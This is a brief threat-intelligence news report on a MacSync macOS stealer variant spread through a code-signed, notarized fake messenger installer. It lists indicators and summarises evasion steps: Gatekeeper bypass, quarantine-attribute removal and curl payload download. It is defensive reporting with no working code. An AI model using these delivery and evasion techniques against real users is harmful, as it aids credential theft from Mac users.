Cybersecurity researchers at Jamf reported the discovery of a new variant of the macOS information stealer MacSync delivered inside a code-signed, notarized Swift application that posed as a messaging app installer in a disk image named zk-call-messenger-installer-3.9.2-lts.dmg hosted on zkcall[.]net/download.
The signed and notarized installer could run without being blocked by built-in controls such as Gatekeeper or XProtect, and was observed prompting users to right-click and open the app to bypass safeguards; Apple has revoked the associated code signing certificate.
Jamf researchers said the Swift-based dropper performs checks for internet connectivity, enforces a minimum execution interval of about 3,600 seconds, removes quarantine attributes and validates files before execution, then downloads and runs an encoded payload through a helper component; analysts also noted deviations in the curl command flags, including the use of -fL and -sS and the –noproxy option.
The researchers found the disk image was artificially inflated to about 25.5 MB by embedding unrelated PDF documents, and that the Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first appeared in April 2025.
Jamf noted that other campaigns have used code-signed DMG files mimicking Google Meet to deliver different macOS stealers such as Odyssey, while some actors continue to use unsigned disk images to deliver DigitStealer DigitStealer, highlighting a trend toward distribution methods that attempt to make malicious apps appear legitimate.